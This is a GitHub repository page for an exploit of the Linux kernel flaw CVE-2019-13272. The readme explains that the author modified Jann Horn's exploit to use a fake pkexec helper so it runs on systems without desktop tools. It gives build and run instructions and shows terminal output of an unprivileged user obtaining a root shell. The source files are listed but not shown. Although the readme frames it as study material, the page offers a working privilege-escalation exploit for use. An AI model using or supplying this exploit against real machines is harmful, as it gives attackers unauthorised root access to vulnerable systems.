Skip to content
Branch: master
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
exp.c
fakehelper.c
fakepkexec.c
make.sh
readme.md

readme.md

CVE-2019-13272

Exploit

this bug was found by Jann Horn, great job! his exploit needs the help of pkexec tools, which do not exists in non-desktop system

In order to study this bug more convenient, I modify his exploit code to use a 'fakepkexec' helper, such that the modified exploit can be used in any unix-system with kernel = linux 4.10 < 5.1.17

  • [EXP](use root permission to run 'sh make.sh' to build, then use non-root permission to run /tmp/exp to get root shell)
root@ubuntu:/tmp/EXP-CVE-2019-13272# sh make.sh 
$ id
uid=1001(test) gid=1001(test) groups=1001(test) context=system_u:system_r:kernel_t:s0
$ /tmp/exp	
executing passwd
attached to midpid
root@ubuntu:/tmp/EXP-CVE-2019-13272# id
uid=0(root) gid=0(root) groups=0(root),1001(test) context=system_u:system_r:kernel_t:s0

Reference

You can’t perform that action at this time.